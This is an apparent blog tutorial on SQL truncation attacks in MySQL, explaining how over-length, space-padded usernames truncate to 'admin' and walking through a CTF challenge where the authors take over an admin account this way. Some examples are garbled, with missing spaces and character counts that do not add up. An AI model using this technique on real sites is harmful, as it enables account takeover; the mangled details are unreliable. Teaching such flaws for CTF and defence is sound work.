In this article we will learn about SQL truncation attack.
What is SQL truncation attack?
SQL Truncation Vulnerability is a very interesting database bug. Successful exploitation of this issue results in user account compromise, as it means that an attacker can access any user account with their own password. Sounds interesting!
First, let’s see why this problem occurs in the database. If the user input value does not validate its length, it may be truncated. If MySQL is running in default mode, the administrator account as admin, the database column is limited to 20 characters.
What is happening in the backend database now? By default, MySQL truncates strings longer than the defined maximum column width and only issues a warning. But these warnings are usually only seen in the backend database, not in the web applications, and thus are not handled at all. MySQL does not compare strings in binary mode. By default, looser matching rules are used.
One of these relaxations is that trailing whitespace characters are ignored during comparisons. This means that the string “admin” is still equal to the string “admin” in the database. And that’s why the application refuses to accept a new user. If the attacker provides “admin ninja” and the application searches the database for that user and cannot find it because the username column name is limited to 20 characters and the attacker supplied 21 characters, the application will accept the new username. and insert into the database. Given the length of the column is 20 characters, the application truncates the username and inserts it as “admin”. Now the table contains two administrators, “admin” and “admin”.
Now we will see a practical scenario of this attack. There was a recent CTF challenge at http://ctf.notsosecure.com/ and the first issue was SQL Truncation to catch the first flag.
We opened the URL and found the login page.
Our first attempt was to check for default credentials. We tried username as admin and password as admin and we successfully logged in.
What the hell happened? That was our response, but this is an online hosted challenge, so someone has already created that admin password. But our motive is that to get admin access with our credentials it means we need to create a user first by registering to this app.
We logged out from the application and found the register link on that page.
So we registered a user from this form and then logged in into the application.
You will now see a message saying “you are not an administrator”. We need to compromise this admin account. The first thing we know is that the default administrator account exists, now we will check the username character limit whether there is a limit or not. We verify that a username with 20 characters can be registered. The application accepts up to 20 characters and the rest of the characters are not accepted. So here we can perform a truncation attack. So again we try to register a user with the username ‘admin ninjasecurity’, it has 33 characters and the password is pass@123
Here the application will accept up to 20 characters and the rest of the characters that are “ninjasecurity” will be ignored. It will be inserted into the database as “admin”.
Our user is successfully registered.
Now we try to login as admin with password pass@123 and Boom! We are logged in.
Related article:Ethical Hacking Interview Questions 2023